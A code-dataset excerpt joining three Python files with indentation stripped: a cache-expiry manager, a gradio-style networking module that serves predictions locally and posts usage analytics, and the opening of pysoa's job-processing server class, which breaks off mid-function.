if not slf.livect: # all caches have been gc'd, kill the thread
slf.print_error("No more caches, stopping manager thread and removing singleton")
slf.q.put(None) # signal thread to stop
thread2join = slf.thread
cls._instance = None # kill self.
if thread2join:
# we do this here as defensive programming to avoid deadlocks in case
# thread ends up taking locks in some future implementation.
thread2join.join()
def mgr_thread(self):
cls = type(self)
#self.print_error("thread started")
try:
while True:
try:
x = self.q.get(timeout=self.tick_interval)
return # we got a stop signal
except queue.Empty:
# normal condition, we slept with nothing to do
pass
cls.tick += 1
for c in tuple(self.caches): # prevent cache from dying while we iterate
len_c = len(c.d) # capture length here as c.d may mutate and grow while this code executes.
if len_c > c.maxlen:
t0 = time.time()
num = cls._try_to_expire_old_items(c.d, len_c - c.maxlen)
tf = time.time()
self.print_error("{}: flushed {} items in {:.02f} msec".format(c.name, num,(tf-t0)*1e3))
finally:
self.print_error("thread exit")
@classmethod
def _try_to_expire_old_items(cls, d_orig, num):
d = d_orig.copy() # yes, this is slow but this makes it so we don't need locks.
assert len(d) > num and num > 0
# bin the cache.dict items by 'tick' (when they were last accessed)
bins = defaultdict(list)
for k,v in d.items():
tick = v[0]
bins[tick].append(k)
del d
# now, expire the old items starting with the oldest until we
# expire num items. note that during this loop it's possible
# for items to get their timestamp updateed by ExpiringCache.get().
# This loop will not detect that situation and will expire them anyway.
# This is fine, because it's a corner case and in the interests of
# keeping this code as simple as possible, we don't bother to guard
# against that.
ct = 0
sorted_bin_keys = sorted(bins.keys())
while ct < num and bins:
tick = sorted_bin_keys[0]
for key in bins[tick]:
del d_orig[key] # KeyError here should never happen. if it does we want the exception because it means a bug in this code
ct += 1
if ct >= num:
break
else:
del bins[tick]
del sorted_bin_keys[0]
return ct
def get_object_size(obj_0):
''' Debug tool -- returns the amount of memory taken by an object in bytes
by deeply examining its contents recursively (more accurate than
sys.getsizeof as a result). '''
import sys
from numbers import Number
from collections import Set, Mapping, deque
try: # Python 2
zero_depth_bases = (basestring, Number, xrange, bytearray)
iteritems = 'iteritems'
except NameError: # Python 3
zero_depth_bases = (str, bytes, Number, range, bytearray)
iteritems = 'items'
def getsize(obj_0):
"""Recursively iterate to sum size of object & members."""
_seen_ids = set()
def inner(obj):
obj_id = id(obj)
if obj_id in _seen_ids:
return 0
_seen_ids.add(obj_id)
size = sys.getsizeof(obj)
if isinstance(obj, zero_depth_bases):
pass # bypass remaining control flow and return
elif isinstance(obj, (tuple, list, Set, deque)):
size += sum(inner(i) for i in obj)
elif isinstance(obj, Mapping) or hasattr(obj, iteritems):
size += sum(inner(k) + inner(v) for k, v in getattr(obj, iteritems)())
# Check for custom object instances - may subclass above too
if hasattr(obj, '__dict__'):
size += inner(vars(obj))
if hasattr(obj, '__slots__'): # can have __slots__ with __dict__
size += sum(inner(getattr(obj, s)) for s in obj.__slots__ if hasattr(obj, s))
return size
return inner(obj_0)
return getsize(obj_0)
|
networking.py
|
"""
Defines helper methods useful for setting up ports, launching servers, and handling `ngrok`
"""
import os
import socket
import threading
from http.server import HTTPServer as BaseHTTPServer, SimpleHTTPRequestHandler
import pkg_resources
from distutils import dir_util
from gradio import inputs, outputs
import json
from gradio.tunneling import create_tunnel
import urllib.request
from shutil import copyfile
import requests
import sys
import analytics
INITIAL_PORT_VALUE = int(os.getenv(
'GRADIO_SERVER_PORT', "7860")) # The http server will try to open on port 7860. If not available, 7861, 7862, etc.
TRY_NUM_PORTS = int(os.getenv(
'GRADIO_NUM_PORTS', "100")) # Number of ports to try before giving up and throwing an exception.
LOCALHOST_NAME = os.getenv(
'GRADIO_SERVER_NAME', "127.0.0.1")
GRADIO_API_SERVER = "https://api.gradio.app/v1/tunnel-request"
STATIC_TEMPLATE_LIB = pkg_resources.resource_filename("gradio", "templates/")
STATIC_PATH_LIB = pkg_resources.resource_filename("gradio", "static/")
STATIC_PATH_TEMP = "static/"
TEMPLATE_TEMP = "index.html"
BASE_JS_FILE = "static/js/all_io.js"
CONFIG_FILE = "static/config.json"
ASSOCIATION_PATH_IN_STATIC = "static/apple-app-site-association"
ASSOCIATION_PATH_IN_ROOT = "apple-app-site-association"
FLAGGING_DIRECTORY = 'static/flagged/'
FLAGGING_FILENAME = 'data.txt'
analytics.write_key = "uxIFddIEuuUcFLf9VgH2teTEtPlWdkNy"
analytics_url = 'https://api.gradio.app/'
def build_template(temp_dir):
"""
Create HTML file with supporting JS and CSS files in a given directory.
:param temp_dir: string with path to temp directory in which the html file should be built
"""
dir_util.copy_tree(STATIC_TEMPLATE_LIB, temp_dir)
dir_util.copy_tree(STATIC_PATH_LIB, os.path.join(
temp_dir, STATIC_PATH_TEMP))
# Move association file to root of temporary directory.
copyfile(os.path.join(temp_dir, ASSOCIATION_PATH_IN_STATIC),
os.path.join(temp_dir, ASSOCIATION_PATH_IN_ROOT))
def render_template_with_tags(template_path, context):
"""
Combines the given template with a given context dictionary by replacing all of the occurrences of tags (enclosed
in double curly braces) with corresponding values.
:param template_path: a string with the path to the template file
:param context: a dictionary whose string keys are the tags to replace and whose string values are the replacements.
"""
print(template_path, context)
with open(template_path) as fin:
old_lines = fin.readlines()
new_lines = render_string_or_list_with_tags(old_lines, context)
with open(template_path, "w") as fout:
for line in new_lines:
fout.write(line)
def render_string_or_list_with_tags(old_lines, context):
# Handle string case
if isinstance(old_lines, str):
for key, value in context.items():
old_lines = old_lines.replace(r"{{" + key + r"}}", str(value))
return old_lines
# Handle list case
new_lines = []
for line in old_lines:
for key, value in context.items():
line = line.replace(r"{{" + key + r"}}", str(value))
new_lines.append(line)
return new_lines
def set_config(config, temp_dir):
config_file = os.path.join(temp_dir, CONFIG_FILE)
with open(config_file, "w") as output:
json.dump(config, output)
def get_first_available_port(initial, final):
"""
Gets the first open port in a specified range of port numbers
:param initial: the initial value in the range of port numbers
:param final: final (exclusive) value in the range of port numbers, should be greater than `initial`
:return:
"""
for port in range(initial, final):
try:
s = socket.socket() # create a socket object
s.bind((LOCALHOST_NAME, port)) # Bind to the port
s.close()
return port
except OSError:
pass
raise OSError(
"All ports from {} to {} are in use. Please close a port.".format(
initial, final
)
)
def send_prediction_analytics(interface):
data = {'title': interface.title,
'description': interface.description,
'thumbnail': interface.thumbnail,
'input_interface': interface.input_interfaces,
'output_interface': interface.output_interfaces,
}
print(data)
try:
requests.post(
analytics_url + 'gradio-prediction-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
def serve_files_in_background(interface, port, directory_to_serve=None, server_name=LOCALHOST_NAME):
class HTTPHandler(SimpleHTTPRequestHandler):
"""This handler uses server.base_path instead of always using os.getcwd()"""
def _set_headers(self):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
def translate_path(self, path):
path = SimpleHTTPRequestHandler.translate_path(self, path)
relpath = os.path.relpath(path, os.getcwd())
fullpath = os.path.join(self.server.base_path, relpath)
return fullpath
def log_message(self, format, *args):
return
def do_POST(self):
# Read body of the request.
if self.path == "/api/predict/":
# Make the prediction.
self._set_headers()
data_string = self.rfile.read(
int(self.headers["Content-Length"]))
msg = json.loads(data_string)
raw_input = msg["data"]
prediction, durations = interface.process(raw_input)
output = {"data": prediction, "durations": durations}
if interface.saliency is not None:
saliency = interface.saliency(raw_input, prediction)
output['saliency'] = saliency.tolist()
# if interface.always_flag:
# msg = json.loads(data_string)
# flag_dir = os.path.join(FLAGGING_DIRECTORY, str(interface.hash))
# os.makedirs(flag_dir, exist_ok=True)
# output_flag = {'input': interface.input_interface.rebuild_flagged(flag_dir, msg['data']),
# 'output': interface.output_interface.rebuild_flagged(flag_dir, processed_output),
# }
# with open(os.path.join(flag_dir, FLAGGING_FILENAME), 'a+') as f:
# f.write(json.dumps(output_flag))
# f.write("\n")
self.wfile.write(json.dumps(output).encode())
analytics_thread = threading.Thread(
target=send_prediction_analytics, args=[interface])
analytics_thread.start()
elif self.path == "/api/flag/":
self._set_headers()
data_string = self.rfile.read(
int(self.headers["Content-Length"]))
msg = json.loads(data_string)
flag_dir = os.path.join(FLAGGING_DIRECTORY,
str(interface.flag_hash))
os.makedirs(flag_dir, exist_ok=True)
output = {'inputs': [interface.input_interfaces[
i].rebuild_flagged(
flag_dir, msg['data']['input_data']) for i
in range(len(interface.input_interfaces))],
'outputs': [interface.output_interfaces[
i].rebuild_flagged(
flag_dir, msg['data']['output_data']) for i
in range(len(interface.output_interfaces))],
'message': msg['data']['message']}
with open(os.path.join(flag_dir, FLAGGING_FILENAME), 'a+') as f:
f.write(json.dumps(output))
f.write("\n")
else:
self.send_error(404, 'Path not found: {}'.format(self.path))
class HTTPServer(BaseHTTPServer):
"""The main server, you pass in base_path which is the path you want to serve requests from"""
def __init__(self, base_path, server_address, RequestHandlerClass=HTTPHandler):
self.base_path = base_path
BaseHTTPServer.__init__(self, server_address, RequestHandlerClass)
httpd = HTTPServer(directory_to_serve, (server_name, port))
# Now loop forever
def serve_forever():
try:
while True:
sys.stdout.flush()
httpd.serve_forever()
except (KeyboardInterrupt, OSError):
httpd.shutdown()
httpd.server_close()
thread = threading.Thread(target=serve_forever, daemon=False)
thread.start()
return httpd
def start_simple_server(interface, directory_to_serve=None, server_name=None, server_port=None):
if server_port is None:
server_port = INITIAL_PORT_VALUE
port = get_first_available_port(
server_port, server_port + TRY_NUM_PORTS
)
httpd = serve_files_in_background(interface, port, directory_to_serve, server_name)
return port, httpd
def close_server(server):
server.server_close()
def url_request(url):
try:
req = urllib.request.Request(
url=url, headers={"content-type": "application/json"}
)
res = urllib.request.urlopen(req, timeout=10)
return res
except Exception as e:
raise RuntimeError(str(e))
def setup_tunnel(local_server_port):
response = url_request(GRADIO_API_SERVER)
if response and response.code == 200:
try:
payload = json.loads(response.read().decode("utf-8"))[0]
return create_tunnel(payload, LOCALHOST_NAME, local_server_port)
except Exception as e:
raise RuntimeError(str(e))
def url_ok(url):
try:
r = requests.head(url)
return r.status_code == 200
except ConnectionError:
return False
|
server.py
|
from __future__ import (
absolute_import,
unicode_literals,
)
import argparse
import atexit
import codecs
import importlib
import logging
import logging.config
import os
import random
import signal
import sys
import threading
import time
import traceback
from types import FrameType
from typing import (
Any,
Callable,
Dict,
List,
Mapping,
Optional,
Type,
TypeVar,
cast,
)
import attr
from pymetrics.instruments import (
Timer,
TimerResolution,
)
from pymetrics.recorders.base import MetricsRecorder
import six
from pysoa.client.client import Client
from pysoa.common.constants import (
ERROR_CODE_ACTION_TIMEOUT,
ERROR_CODE_JOB_TIMEOUT,
ERROR_CODE_RESPONSE_NOT_SERIALIZABLE,
ERROR_CODE_RESPONSE_TOO_LARGE,
ERROR_CODE_SERVER_ERROR,
ERROR_CODE_UNKNOWN,
)
from pysoa.common.errors import Error
from pysoa.common.logging import (
PySOALogContextFilter,
RecursivelyCensoredDictWrapper,
)
from pysoa.common.serializer.errors import InvalidField
from pysoa.common.transport.base import ServerTransport
from pysoa.common.transport.errors import (
MessageReceiveTimeout,
MessageTooLarge,
TransientPySOATransportError,
)
from pysoa.common.types import (
ActionResponse,
Context,
JobResponse,
UnicodeKeysDict,
)
from pysoa.server import middleware
from pysoa.server.django.database import (
django_close_old_database_connections,
django_reset_database_queries,
)
from pysoa.server.errors import (
ActionError,
JobError,
)
from pysoa.server.internal.types import RequestSwitchSet
from pysoa.server.schemas import JobRequestSchema
from pysoa.server.settings import ServerSettings
from pysoa.server.types import (
ActionType,
EnrichedActionRequest,
EnrichedJobRequest,
IntrospectionActionType,
)
import pysoa.version
try:
from pysoa.server.internal.event_loop import AsyncEventLoopThread
except (ImportError, SyntaxError):
AsyncEventLoopThread = None # type: ignore
try:
from django.conf import settings as django_settings
from django.core.cache import caches as django_caches
except ImportError:
django_settings = None # type: ignore
django_caches = None # type: ignore
__all__ = (
'HarakiriInterrupt',
'Server',
'ServerMiddlewareActionTask',
'ServerMiddlewareJobTask',
)
# A hack to make documentation generation work properly, otherwise there are errors (see `if TYPE_CHECKING`)
middleware.EnrichedActionRequest = EnrichedActionRequest # type: ignore
middleware.EnrichedJobRequest = EnrichedJobRequest # type: ignore
ServerMiddlewareJobTask = Callable[[EnrichedJobRequest], JobResponse]
ServerMiddlewareActionTask = Callable[[EnrichedActionRequest], ActionResponse]
_MT = TypeVar('_MT', ServerMiddlewareActionTask, ServerMiddlewareJobTask)
_RT = TypeVar('_RT', JobResponse, ActionResponse)
def _replace_fid(d, fid): # type: (Dict[Any, Any], six.text_type) -> None
for k, v in six.iteritems(d):
if isinstance(v, six.text_type):
d[k] = v.replace('{{fid}}', fid).replace('[[fid]]', fid).replace('%%fid%%', fid)
elif isinstance(v, dict):
_replace_fid(v, fid)
class HarakiriInterrupt(BaseException):
"""
Raised internally to notify the server code about interrupts due to harakiri. You should never, ever, ever, ever
catch this exception in your service code. As such, it inherits from `BaseException` so that even
`except Exception:` won't catch it. However, `except:` will catch it, so, per standard Python coding standards,
you should never use `except:` (or `except BaseException:`, for that matter).
"""
class Server(object):
"""
The base class from which all PySOA service servers inherit, and contains the code that does all of the heavy
lifting for receiving and handling requests, passing those requests off to the relevant actions, and sending
the actions' responses back to the caller.
Required attributes that all concrete subclasses must provide:
- `service_name`: A (unicode) string name of the service.
- `action_class_map`: An object supporting `__contains__` and `__getitem__` (typically a `dict`) whose keys are
action names and whose values are callable objects that return a callable action when called (such as subclasses
of `Action` which, when "called" [constructed], yield a callable object [instance of the subclass])
"""
settings_class = ServerSettings # type: Type[ServerSettings]
request_class = EnrichedActionRequest # type: Type[EnrichedActionRequest]
client_class = Client # type: Type[Client]
use_django = False # type: bool
service_name = None # type: Optional[six.text_type]
action_class_map = {} # type: Mapping[six.text_type, ActionType]
# Allow a server to specify a custom introspection action
introspection_action = None # type: Optional[IntrospectionActionType]
def __init__(self, settings, forked_process_id=None):
# type: (ServerSettings, Optional[int]) -> None
"""
:param settings: The settings object, which must be an instance of `ServerSettings` or one of its subclasses
:param forked_process_id: If multiple processes are forked by the same parent process, this will be set to a
unique, deterministic (incremental) ID which can be used in logging, the heartbeat
file, etc. For example, if the `--fork` argument is used with the value 5 (creating
five child processes), this argument will have the values 1, 2, 3, 4, and 5 across
the five respective child processes.
"""
# Check subclassing setup
if not self.service_name:
raise AttributeError('Server subclass must set service_name')
# Store settings and tweak if necessary based on the forked process ID
self.settings = settings
if self.settings['metrics'].get('kwargs', {}).get('config', {}).get('publishers', {}):
# Check if the metrics publisher config needs the FID anywhere and, if it does, replace it with the FID
fid = 'main' if forked_process_id is None else six.text_type(forked_process_id)
for publisher in self.settings['metrics']['kwargs']['config']['publishers']:
if self.settings['metrics']['kwargs']['config']['version'] == 1:
_replace_fid(publisher, fid)
elif publisher.get('kwargs', {}):
_replace_fid(publisher['kwargs'], fid)
# Create the metrics recorder and transport
self.metrics = self.settings['metrics']['object'](
**self.settings['metrics'].get('kwargs', {})
) # type: MetricsRecorder
self.transport = self.settings['transport']['object'](
self.service_name,
self.metrics,
forked_process_id or 1, # If no forking, there's only 1 instance
**self.settings['transport'].get('kwargs', {})
) # type: ServerTransport
self._async_event_loop_thread = None # type: Optional[AsyncEventLoopThread]
if AsyncEventLoopThread:
self._async_event_loop_thread = AsyncEventLoopThread([
m['object'](**m.get('kwargs', {}))
for m in self.settings['coroutine_middleware']
])
# Set initial state
self.shutting_down = False
self._shutdown_lock = threading.Lock()
self._last_signal = 0
self._last_signal_received = 0.0
# Instantiate middleware
self._middleware = [
m['object'](**m.get('kwargs', {}))
for m in self.settings['middleware']
] # type: List[middleware.ServerMiddleware]
self._middleware_job_wrapper = self.make_middleware_stack([m.job for m in self._middleware], self.execute_job)
# Set up logger
# noinspection PyTypeChecker
self.logger = logging.getLogger('pysoa.server')
# noinspection PyTypeChecker
self.job_logger = logging.getLogger('pysoa.server.job')
# Set these as the integer equivalents of the level names
self.request_log_success_level = logging.getLevelName(self.settings['request_log_success_level']) # type: int
self.request_log_error_level = logging.getLevelName(self.settings['request_log_error_level']) # type: int
class DictWrapper(RecursivelyCensoredDictWrapper):
SENSITIVE_FIELDS = frozenset(
RecursivelyCensoredDictWrapper.SENSITIVE_FIELDS | settings['extra_fields_to_redact'],
)
self.logging_dict_wrapper_class = DictWrapper # type: Type[RecursivelyCensoredDictWrapper]
self._default_status_action_class = None # type: Optional[ActionType]
self._idle_timer = None # type: Optional[Timer]
self._heartbeat_file = None # type: Optional[codecs.StreamReaderWriter]
self._heartbeat_file_path = None # type: Optional[six.text_type]
self._heartbeat_file_last_update = 0.0
self._forked_process_id = forked_process_id
self._skip_django_database_cleanup = False
def handle_next_request(self): # type: () -> None
"""
Retrieves the next request from the transport, or returns if it times out (no request has been made), and then
processes that request, sends its response, and returns when done.
"""
if not self._idle_timer:
# This method may be called multiple times before receiving a request, so we only create and start a timer
# if it's the first call or if the idle timer was stopped on the last call.
self._idle_timer = self.metrics.timer('server.idle_time', resolution=TimerResolution.MICROSECONDS)
self._idle_timer.start()
# Get the next JobRequest
try:
request_id, meta, job_request = self.transport.receive_request_message()
if request_id is None or meta is None or job_request is None:
self.logger.warning('Thought to be impossible, but the transport returned None')
raise MessageReceiveTimeout()
except MessageReceiveTimeout:
# no new message, nothing to do
self._idle_timer.stop()
self.perform_idle_actions()
self._set_busy_metrics(False)
self._idle_timer.start()
return
# We are no longer idle, so stop the timer, reset for the next idle period, and indicate busy in the gauges
self._idle_timer.stop()
self._idle_timer = None
self._set_busy_metrics(True)
self.metrics.publish_all()
try:
PySOALogContextFilter.set_logging_request_context(request_id=request_id, **job_request.get('context', {}))
except TypeError:
# Non unicode keys in job_request['context'] will break keywording of a function call.
# Try to recover by coercing the keys to unicode.
PySOALogContextFilter.set_logging_request_context(
request_id=request_id,
**{six.text_type(k): v for k, v in six.iteritems(job_request['context'])}
)
request_for_logging = self.logging_dict_wrapper_class(job_request)
self.job_logger.log(self.request_log_success_level, 'Job request: %s', request_for_logging)
client_version = tuple(meta['client_version']) if 'client_version' in meta else (0, 40, 0)
def attr_filter(attrib, _value): # type: (attr.Attribute, Any) -> bool
# We don't want older clients to blow up trying to re-attr de-attr'd objects that have unexpected attrs
return (
not attrib.metadata or
'added_in_version' not in attrib.metadata or
client_version >= attrib.metadata['added_in_version']
)
try:
self.perform_pre_request_actions()
# Process and run the Job
job_response = self.process_job(job_request)
# Prepare the JobResponse for sending by converting it to a message dict
try:
response_message = attr.asdict(job_response, dict_factory=UnicodeKeysDict, filter=attr_filter)
except Exception as e:
self.metrics.counter('server.error.response_conversion_failure').increment()
job_response = self.handle_unhandled_exception(e, JobResponse, variables={'job_response': job_response})
response_message = attr.asdict(job_response, dict_factory=UnicodeKeysDict, filter=attr_filter)
response_for_logging = self.logging_dict_wrapper_class(response_message)
# Send the response message
try:
if not job_request.get('control', {}).get('suppress_response', False):
self.transport.send_response_message(request_id, meta, response_message)
except MessageTooLarge as e:
self.metrics.counter('server.error.response_too_large').increment()
job_response = self.handle_job_error_code(
ERROR_CODE_RESPONSE_TOO_LARGE,
'Could not send the response because it was too large',
request_for_logging,
response_for_logging,
extra={'serialized_length_in_bytes': e.message_size_in_bytes},
)
self.transport.send_response_message(
request_id,
meta,
attr.asdict(job_response, dict_factory=UnicodeKeysDict, filter=attr_filter),
)
except InvalidField:
self.metrics.counter('server.error.response_not_serializable').increment()
job_response = self.handle_job_error_code(
ERROR_CODE_RESPONSE_NOT_SERIALIZABLE,
'Could not send the response because it failed to serialize',
request_for_logging,
response_for_logging,
)
self.transport.send_response_message(
request_id,
meta,
attr.asdict(job_response, dict_factory=UnicodeKeysDict, filter=attr_filter),
)
finally:
if job_response.errors or any(a.errors for a in job_response.actions):
if (
self.request_log_error_level > self.request_log_success_level and
self.job_logger.getEffectiveLevel() > self.request_log_success_level
):
# When we originally logged the request, it may have been hidden because the effective logging
# level threshold was greater than the level at which we logged the request. So re-log the
# request at the error level, if set higher.
self.job_logger.log(self.request_log_error_level, 'Job request: %s', request_for_logging)
self.job_logger.log(self.request_log_error_level, 'Job response: %s', response_for_logging)
else:
self.job_logger.log(self.request_log_success_level, 'Job response: %s', response_for_logging)
finally:
PySOALogContextFilter.clear_logging_request_context()
self.perform_post_request_actions()
self._set_busy_metrics(False)
def make_client(self, context, extra_context=None, **kwargs):
# type: (Context, Optional[Context], **Any) -> Client
"""
Gets a `Client` that will propagate the passed `context` in order to to pass it down to middleware or Actions.
The server code will call this method only with the `context` argument and no other arguments. Subclasses can
override this method and replace its behavior completely or call `super` to pass `extra_context` data or
keyword arguments that will be passed to the client. The supplied `context` argument will not be modified in
any way (it will be copied); the same promise is not made for the `extra_context` argument.
:param context: The context parameter, supplied by the server code when making a client
:param extra_context: Extra context information supplied by subclasses as they see fit
:param kwargs: Keyword arguments that will be passed as-is to the `Client` constructor
:return: A `Client` configured with this server's `client_routing` settings and the supplied context, extra
context, and keyword arguments.
"""
context = context.copy()
if extra_context:
context.update(extra_context)
context['calling_service'] = self.service_name
return self.client_class(self.settings['client_routing'], context=context, **kwargs)
# noinspection PyShadowingNames
@staticmethod
def make_middleware_stack(middleware, base): # type: (List[Callable[[_MT], _MT]], _MT) -> _MT
"""
Given a list of in-order middleware callable objects `middleware` and a base function `base`, chains them
together so each middleware is fed the function below, and returns the top level ready to call.
:param middleware: The middleware stack
:param base: The base callable that the lowest-order middleware wraps
:return: The topmost middleware, which calls the next middleware ... which calls the lowest-order middleware,
which calls the `base` callable.
"""
for ware in reversed(middleware):
base = ware(base)
return base
def process_job(self, job_request): # type: (Dict[six.text_type, Any]) -> JobResponse
"""
Validate, execute, and run the job request, wrapping it with any applicable job middleware.
:param job_request: The job request dict
:return: A `JobResponse` object
"""
try:
# Validate JobRequest message
validation_errors = [
Error(
code=error.code,
message=error.message,
field=error.pointer,
is_caller_error=False, # because this only happens if the client library code is buggy
)
for error in (JobRequestSchema.errors(job_request) or [])
]
if validation_errors:
raise JobError(errors=validation_errors, set_is_caller_error_to=None)
# Add the client object in case a middleware or action wishes to use it
job_request['client'] = self.make_client(job_request['context'])
# Add the run_coroutine in case a middleware or action wishes to use it
if self._async_event_loop_thread:
job_request['run_coroutine'] = self._async_event_loop_thread.run_coroutine
else:
job_request['run_coroutine'] = None
job_response = self._middleware_job_wrapper(EnrichedJobRequest(**job_request))
if 'correlation_id' in job_request['context']:
job_response.context['correlation_id'] = job_request['context']['correlation_id']
except HarakiriInterrupt:
self.metrics.counter('server.error.harakiri', harakiri_level='job')
job_response = JobResponse(
errors=[Error(
code=ERROR_CODE_JOB_TIMEOUT,
message='The service job ran for too long and had to be interrupted (probably a middleware issue).',
is_caller_error=False,
)],
)
except JobError as e:
self.metrics.counter('server.error.job_error').increment()
job_response = JobResponse(errors=e.errors)
except Exception as e:
# Send a job error response if no middleware caught this.
self.metrics.counter('server.error.unhandled_error').increment()
return self.handle_unhandled_exception(e, JobResponse)
return job_response
def handle_unhandled_exception(self, exception, response_type, variables=None, **kwargs):
# type: (Exception, Type[_RT], Optional[Dict[six.text_type, Any]], **Any) -> _RT
"""
Makes and returns a last-ditch error response based on an unknown, unexpected error.
:param exception: The exception that happened.
:param response_type: The response type (:class:`JobResponse` or :class:`ActionResponse`) that should be
created.
:param variables: An optional dictionary of context-relevant variables to include in the error response.
:param kwargs: Keyword arguments that will be passed to the response object created.
:return: A `JobResponse` object or `ActionResponse` error based on the `response_type` argument.
"""
# noinspection PyBroadException
try:
# Get the error and traceback if we can
error_str, traceback_str = six.text_type(exception), traceback.format_exc()
except Exception:
self.metrics.counter('server.error.error_formatting_failure').increment()
error_str, traceback_str = 'Error formatting error', traceback.format_exc()
# Log what happened
self.logger.exception(exception)
if not isinstance(traceback_str, six.text_type):
try:
traceback_str = traceback_str.decode('utf-8')
except UnicodeDecodeError:
traceback_str = 'UnicodeDecodeError: Traceback could not be decoded'
error_dict = {
'code': ERROR_CODE_SERVER_ERROR,
'message': 'Internal server error: %s' % error_str,
'traceback': traceback_str,
'is_caller_error': False,
} # type: Dict[six.text_type, Any]
if variables is not None:
# noinspection PyBroadException
try:
error_dict['variables'] = {key: repr(value) for key, value in variables.items()}
except Exception:
self.metrics.counter('server.error.variable_formatting_failure').increment()
error_dict['variables'] = 'Error formatting variables'
return response_type(errors=[Error(**error_dict)], **kwargs)
def handle_job_error_code(
self,
code, # type: six.text_type
message, # type: six.text_type
request_for_logging, # type: RecursivelyCensoredDictWrapper
response_for_logging, # type: RecursivelyCensoredDictWrapper
extra=None, # type: Optional[Dict[six.text_type, Any]]
):
# type: (...) -> JobResponse
"""
Makes and returns a last-ditch error response based on a known, expected (though unwanted) error while
logging details about it.
:param code: The error code.
:param message: The error message.
:param request_for_logging: The censor-wrapped request dictionary.
:param response_for_logging: The censor-wrapped response dictionary.
:param extra: Any extra items to add to the logged error.
:return: A `JobResponse` object.
"""
log_extra = {'data': {'request': request_for_logging, 'response': response_for_logging}}
if extra:
log_extra['data'].update(extra)
self.logger.error(
message,
exc_info=True,
extra=log_extra,
)
return JobResponse(errors=[Error(code=code, message=message, is_caller_error=False)])
def execute_job(self, job_request): # type: (EnrichedJobRequest) -> JobResponse
"""
Processes and runs the action requests contained in the job and returns a `JobResponse`.
:param job_request: The job request
:return: A `JobResponse` object
"""
# Run the Job's Actions
harakiri = False
job_response = JobResponse()
job_switches = RequestSwitchSet(job_request.context['switches'])
for i, simple_action_request in enumerate(job_request.actions):
# noinspection PyArgumentList
action_request = self.request_class(
action=simple_action_request.action,
body=simple_action_request.body,
switches=job_switches,
context=job_request.context,
control=job_request.control,
client=job_request.client,
run_coroutine=job_request.run_coroutine,
)
action_request._server = self
action_in_class_map = action_request.action in self.action_class_map
if action_in_class_map or action_request.action in ('status', 'introspect'):
# Get action to run
if action_in_class_map:
action = self.action_class_map[action_request.action](self.settings)
elif action_request.action == 'introspect':
# If set, use custom introspection action. Use default otherwise.
if self.introspection_action is not None:
action = self.introspection_action(self)
else:
from pysoa.server.action.introspection import IntrospectionAction
action = IntrospectionAction(server=self)
else:
if not self._default_status_action_class:
from pysoa.server.action.status import make_default_status_action_class
self._default_status_action_class = make_default_status_action_class(self.__class__)
# noinspection PyTypeChecker
action = self._default_status_action_class(self.settings)
# Wrap it in middleware
wrapper = self.make_middleware_stack(
[m.action for m in self._middleware],
action,
)
# Execute the middleware stack
try:
PySOALogContextFilter.set_logging_action_name(action_request.action)
action_response = wrapper(action_request)
except HarakiriInterrupt:
self.metrics.counter('server.error.harakiri', harakiri_level='action')
action_response = ActionResponse(
action=action_request.action,
errors=[Error(
code=ERROR_CODE_ACTION_TIMEOUT,
message='The action "{}" ran for too long and had to be interrupted.'.format(
action_request.action,
),
is_caller_error=False,
)],
)
harakiri = True
except ActionError as e:
# An action error was thrown while running the action (or its middleware)
action_response = ActionResponse(
action=action_request.action,
errors=e.errors,
)
except JobError:
# It's unusual for an action or action middleware to raise a JobError, so when it happens it's
# usually for testing purposes or a really important reason, so we re-raise instead of handling
# like we handle all other exceptions below.
raise
except Exception as e:
# Send an action error response if no middleware caught this.
self.metrics.counter('server.error.unhandled_error').increment()
action_response = self.handle_unhandled_exception(e, ActionResponse, action=action_request.action)
finally:
PySOALogContextFilter.clear_logging_action_name()
else:
# Error: Action not found.
action_response = ActionResponse(
action=action_request.action,
errors=[Error(
code=ERROR_CODE_UNKNOWN,
message='The action "{}" was not found on this server.'.format(action_request.action),
field='action',
is_caller_error=True,
)],
)
job_response.actions.append(action_response)
if harakiri or (
action_response.errors and
not job_request.control.get('continue_on_error', False)
):
# Quit running Actions if harakiri occurred or an error occurred and continue_on_error is False
break
return job_response
def handle_shutdown_signal(self, signal_number, _stack_frame): # type: (int, FrameType) -> None
"""
Handles the reception of a shutdown signal.
"""
if not self._shutdown_lock.acquire(False):
# Ctrl+C can result in 2 or even more signals coming in within nanoseconds of each other. We lock to
# prevent handling them all. The duplicates can always be ignored, so this is a non-blocking acquire.
return
try:
if self.shutting_down:
if (
self._last_signal in (signal.SIGINT, signal.SIGTERM) and
self._last_signal != signal_number and
time.time() - self._last_signal_received < 1
):
self.logger.info('Ignoring duplicate shutdown signal received within one second of original signal')
else:
self.logger.warning('Received double interrupt, forcing shutdown')
sys.exit(1)
else:
self.logger.warning('Received interrupt, initiating shutdown')
self.shutting_down = True
self._last_signal = signal_number
self._last_signal_received = time.time()
finally:
self._shutdown_lock.release()
def harakiri(self, signal_number, _stack_frame): # type: (int, FrameType) -> None
"""
Handles the reception of a timeout signal indicating that a request has been processing for too long, as
defined by the harakiri settings. This method makes use of two "private" Python functions,
`sys._current_frames` and `os._exit`, but both of these functions are publicly documented and supported.
"""
if not self._shutdown_lock.acquire(False):
# Ctrl+C can result in 2 or even more signals coming in within nanoseconds of each other. We lock to
# prevent handling them all. The duplicates can always be ignored, so this is a non-blocking acquire.
return
threads = {
cast(int, t.ident): {'name': t.name, 'traceback': ['Unknown']}
for t in threading.enumerate()
} # type: Dict[int, Dict[six.text_type, Any]]
# noinspection PyProtectedMember
for thread_id, frame in sys._current_frames().items():
stack = []
for f in traceback.format_stack(frame):
stack.extend(f.rstrip().split('\n'))
if 'for f in traceback.format_stack(frame):' in stack[-1] and 'in harakiri' in stack[-2]:
# We don't need the stack data from this code right here at the end of the stack; it's just confusing.
stack = stack[:-2]
threads.setdefault(thread_id, {'name': thread_id})['traceback'] = stack
extra = {'data': {'thread_status': {
t['name']: [line.rstrip() for line in t['traceback']] for t in threads.values()
}}}
details = 'Current thread status at harakiri trigger:\n{}'.format('\n'.join((
'Thread {}:\n{}'.format(t['name'], '\n'.join(t['traceback'])) for t in threads.values()
)))
try:
self._last_signal = signal_number
self._last_signal_received = time.time()
if self.shutting_down:
self.logger.error(
'Graceful shutdown failed {} seconds after harakiri. Exiting now!'.format(
self.settings['harakiri']['shutdown_grace']
),
extra=extra,
)
self.logger.info(details)
try:
self.metrics.counter('server.error.harakiri', harakiri_level='emergency')
self.metrics.publish_all()
finally:
